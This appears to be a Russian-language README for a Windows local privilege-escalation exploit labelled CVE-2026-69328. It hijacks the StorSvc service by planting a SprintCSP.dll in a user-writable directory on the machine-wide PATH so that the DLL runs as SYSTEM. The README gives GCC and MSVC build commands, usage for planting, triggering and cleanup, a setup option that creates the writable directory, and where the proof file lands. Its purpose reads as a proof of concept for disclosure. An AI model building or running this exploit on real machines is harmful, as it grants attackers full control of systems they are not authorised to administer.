
Эксплойт повышения привилегий в Windows, который размещает SprintCSP.dll в доступном для записи пользователем каталоге HKLM PATH для перехвата StorSvc и выполнения с правами SYSTEM.
StorSvc загружает SprintCSP.dll по относительному имени с правами SYSTEM. Поместите её в доступный для записи пользователем каталог из HKLM PATH — и получите SYSTEM.
Требуется доступный для записи пользователем каталог в HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\Path.
На чистом образе таких нет. Их добавляют установщики инструментов (%USERPROFILE%\.cargo\bin, .local\bin, Python Scripts). Если на машине такого каталога нет, CVE-2026-69328.exe --setup создаёт его, что требует однократного запроса прав администратора. Самому эксплойту права администратора не нужны.
GCC:
gcc payload.c -shared -o SprintCSP.dll
gcc CVE-2026-69328.c -lrpcrt4 -ladvapi32 -lshell32 -o CVE-2026-69328.exe
MSVC:
cl /LD payload.c /Fe:SprintCSP.dll
cl CVE-2026-69328.c rpcrt4.lib advapi32.lib shell32.lib /Fe:CVE-2026-69328.exe
CVE-2026-69328.exe plant, trigger, read proof
CVE-2026-69328.exe --cleanup remove proof file + planted DLL
Доказательство сохраняется в C:\Windows\System32\CVE-2026-69328.txt.
StorSvc падает после загрузки, и SCM перезапускает его примерно через 120 с.